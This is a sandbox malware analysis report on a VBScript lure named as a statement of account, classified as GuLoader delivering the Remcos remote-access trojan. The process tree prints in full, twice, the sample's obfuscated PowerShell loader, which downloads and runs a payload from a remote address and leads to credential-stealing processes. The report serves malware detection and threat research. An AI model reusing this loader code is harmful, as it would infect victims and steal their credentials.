Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
STATEMENT OF ACCOUNT.vbs

Overview

General Information

Sample name:STATEMENT OF ACCOUNT.vbs
Analysis ID:1465957
MD5:229da25a75bd9df3b4bd92268ed0d2fe
SHA1:fe45ca4366c5f7a5bc6df83bc66e18b691041f4f
SHA256:ec41d23e297c8f8aa407ef610a8f3082a1e103addf113cfe3e4d2ec6733b54e8
Tags:vbs
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5660 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7268 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7372 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Snarlig ');Skildrerne (Gunflints 'Konkurr$ V.ndibgrigsvaalEfte slo VindicbPrierslaTeltn nlMandsdo:TresindCHippiati LillikrCen.rifcCarumseu AntiagmStolearsSidevejctransfor Gelosii Skarrib Nonp,riProclainR,ppledgUnga,va1Goldaks3Udkaare3Subtera=Keglesp$skyllesPGl,cocoaLftenebrHall,nboForandrlNordmane EksporeNonconssMaskins.ConfratsKunstvapDistriblKalvelbi Un erdtImmatri(Simplic$ColubriFStenf suStnkeprrStandsfiBoghandbKapitaluRub.ikkn.ejlensdDomicil) Ty gde ');Skildrerne (Gunflints 'Ndu gan[J.urnalN HjhuseeO,eosactBic,lor. ,okhavSCoprop,eAlkoholrBrightsvNecrotyiRidsefjc lejereeInterlaPS,inetsoDipl.piisquawfinOstepintA.acathMInd.rdeaHamartonkortfriaPaasta.gPlanlgneStivnenrDegforh]Kom,ker:Foundfl: Hel,deSJordskreTransvecAg,ntdiu aderskrcoapti iLemlstetUncivilyPolemikPSubs,itr BlisteoCo.ntertBro.kaloP.everic CulturoSk,vbunlBuffsbe Fol,tb= nbigge Later.l[RkvrkerNArckinge VldesftProcent.de.mareSAntisepeReflekscBjergaruConniverKaynetfiEskamottDrypsseyNeiatidP P rrelrResinizo anzonet HypertoFonematcFarmlano Rneb,ilplastsfTdiningmy ImperspSterlaneUndervu]Svagt.e: Incine:RegildfTC.evisvlthermicsChi ois1 Satin.2Buffoon ');$Parolees=$Circumscribing133[0];$Tubae= (Gunflints 'Surclif$takeup.gmedaljelrelstatoB.rgmesbE ilemmaDribledl Stepch: up,rtiA PrograkRepavestAmaze saKdehusfnGeograft,eflatim under o Ce,sordoricycleV,stenfledvinscsCons.bs=KommandNIndefrye DurianwMammoni-,eprievO.accinibStrafpojBesvarbeTvety,icDunnabstLamslaa .hokolaSwoadedey Pe,tapsAtingantcigare e Wronskm Gigado.Bem strNLithophe.ynipidtPostmes. Ge metWHighlane.ellbirbdecim lCOutswinlv,vacehikmpestoeBesyngenS ibestt');$Tubae+=$Kundetjenestens[1];Skildrerne ($Tubae);Skildrerne (Gunflints 'Adresse$ PengelAKabardck Coun,etUfrihedaAlenlannSkalotttAsse,temPromerco Ste.dddSodalite Ska arl.istandsUnderpi.Bl ckfeHKnkkreseK,nspeoaphotogrdPredamneBarytafrUdke nes Bejdse[omhandl$StandarsRumsterpS,krestlF ltrediSynkopefUnpsychfSlalomk]fejltry=Scriptu$FourageCSulphopr B omsty MelicrpBiograftHurdlenoSmdexclgHelfredlLytter a Rebuttu N,ncomx Campe, ');$Lbetidens=Gunflints ' r maun$PardeddAFrilandkDimmestt Nu,bedaAngakoknReauthotUnpeggemE.tersloImpeevid nticomeIchthyil O.ticisHavar r. A.trinD GribanoFleshl wC,ristenG.ossopl Tris.eoAnimi ma Jagg.ed I,dekoFAce.ylsiOnsswiml Gearale Calibe(tryksva$PreschoPParitetaeffoliarStrawbro UnvitilKaffekoeO.ooutpe Libid.sCurariz, Hypopo$tndehvlAMixbloorPrimovinTbruddeoHomoeoglBrandbyd StandasMatchet)Pik nte ';$Arnolds=$Kundetjenestens[0];Skildrerne (Gunflints 'M.rkeds$UnpropegLoquitulBlankebo,ristesbBrigadeaRullendlDi.turb:SensomoKGleanabfDisagretGreggrie Bumpi,r ,ortcusTr posp=Okkerfo(GlossopT Scan.ae injenusContractAethere-AfbrydePBenzinsaFokuse.t banalehPorop.y Minimum$.nfeminA lagg,rrGr ynesnvognfuloForge slPti,imndSjldenhs Re.nbu)Snorker ');while (!$Kfters) {Skildrerne (Gunflints 'Acetoni$ Spa drgPtyali.lPrdikatoBor.glybSprogfoaLucarnelStylish:Altern,FUndvreraraxingpaNaalenedSomatoce,usiodi=Nedslag$FunctiotUdbytter PhobicuLuftvaae Recipr ') ;Skildrerne $Lbetidens;Skildrerne (Gunflints ' ForrenSMellemttTy letsa orgivrBrugel,tUpupakr-CirkulrSIfuga,ulEarflapeIndst,de BriarepSlisken Rudeskr4flashly ');Skildrerne (Gunflints 'F,rudbe$ Bentjegkvintetl TermomoSem.orgb epetrpa GotfrelUskadel:KransenK Rebaptf Udmrk.tGaylefreLeopardrmoralizs Infor =Fastkr ( onfesTTab osieUnfondns hangertstereos- DustouPbudgiesaSchistatPrinterh Improb Demogra$Urede,bA Kas kurTrommetnCari atoK ndinglKnalderdForud.esKarakte).ryllup ') ;Skildrerne (Gunflints 'acceler$CognacegMorfinil GennemoMangonibEfterfoaLipodyslteleuto:Pat ticSCente ec HjovneaSmaaovem DoctorpRonnif iRagtimeeP oalcosTonneau=Sphecin$Rambledg .arietlkons,ruoSanmar,bOktavera DagldelHobende:ReflowiCSystal ahydrocotPentagyhJatropha,dresserDeweddoimarchern Afvbni+Lsehast+Oriflam%Udspalt$ReflexoCKargoeriCentigrrPaa aefcDis avouSubtensmUnderspsT.oublecEcrus,arRligs eisaggonibKok,ttoiJohannenchylifig Reli,t1Tilbund3Ama,gam3 amvitt.GrassmecUpaaagtoSporinguStaktopnTjattentLantern ') ;$Parolees=$Circumscribing133[$Scampies];}$Bibliomanis=316121;$Rehumanized=28218;Skildrerne (Gunflints 'Zincode$Kjoveacgsnu fbolSe ibaroSpectrobMaalscoa Rubinsl Mononu: isidenao ducerlA.legatfK,ypteraSpekulabdaemonye PlanlgtSolvolyiProgramsRidglinePhage erBurresneZygosi,sTrangbi Inhabil=Quaff.z IncentrG SteevieAftr,nitTimelns- .ohansCAnth acoFirma anDuksedrtParasite Brogu,nPo,arfot Cellsm Byvaa e$TribadiAChicnesrR.uterenOlivasto Fors,dlA.ainqudtippiessMarty,i ');Skildrerne (Gunflints 'Hy roco$ ChordegUnwithhlReturvroMicrosebSessel.aWagoneelCiviliz:PaategnBLserindvArbejd e BumekslTalmudisRawlplueNinepegr Sk inen edinafeSuburbl Ophobn=Lini mn Unsunke[whosisoS Landssy ImbrexsFal kmntKon,esseTricho mbib iot.IndarbeCB,oknivo KuglelnrappendvAgrobioe Nonvinr U,hailtFrys.di]Un,erst:Narcot.:.estrucFMenagerrMaintenoProportmideyka.BRverkulaLoka plsfoun.fueMisrule6Gus,abl4Sulf,glSAntikomt De,outrMoskvafiAdve.binUnpossigLin.ers(Overpow$KlintekaManhat,lLyocratfOmk,slea easandb OptageeAfsvovltWic,iupiAlbatiosSund,yieKirurgerSy dacteDistriks Labora)Ridesko ');Skildrerne (Gunflints 'defocus$ LigningDanaidelFra.kekohedon,sbCharybdaFattierlBaromet: LinninS ,resteiBalustel aronicv piesineTrllearrFli tlasDroso hmdegradeiCutletftstilli,hNrvrforsNonshri Botswan=Str,nin Cascad[AfhaareSGyp.schy YardwasKom agntOmbudsme.dstyknmTemp.ri.GynaecoT WuffgoeSkuffe.x.ousehotM.croso.Forva.tETre,ketnTorpe.oc Sulp ioPrognosdKlubkamiSalonkonSkumplegKik.ter]Kopsk f:Ptosish:kriminaA CuriouS,ampradCSarpopoITotemisISig,els.Ph.lantGAfstumpeVati,antCrossgrSTern.tft .kulperVict.mii SchoolnIndeflug.kattef(Forespo$ BrokadBKlangenvt iperseAccruablRedundas FlogmaeCommorarKatalogn CatdomeAngloam)Tigh fi ');Skildrerne (Gunflints 'Topwor.$ Fil prgInfloodltrkpa ioBrnebidb ogmrkeaScutel,lSalvier:RuefulnRPrangereFriha nsScrophutRecag ksBetnknit KanskerAutostoaOfr.rwhf,yedropfUdmar seFustagenIngeni,eBlodtabs Afsnit=Brlesin$ KlientSsuspirei Occurel Smackev BarbareTriptllrKardanesAfsendemModellei UnmatutPol.gonhVi.dspesOvovivi.Omg,dedsElsdyrsuOculospbAcarinosDykk netOutlippr AllotriAlteratnRevidergStorcir(Extrabu$UdbredeBPaandteiTelefo.b LnudvilheteropiVulgarioUna.atimEmi sioa MofussnTanglesi Accidestrussen,mancipi$FourthlRKvadrateCtosli.hRvhulleu Solecim psigelaHexosepnLini.reiEpidermzGeison,eParatesd.verskr)Noncl n ');Skildrerne $Reststraffenes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 7772 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7936 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7944 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 7964 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8036 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8044 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 8068 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

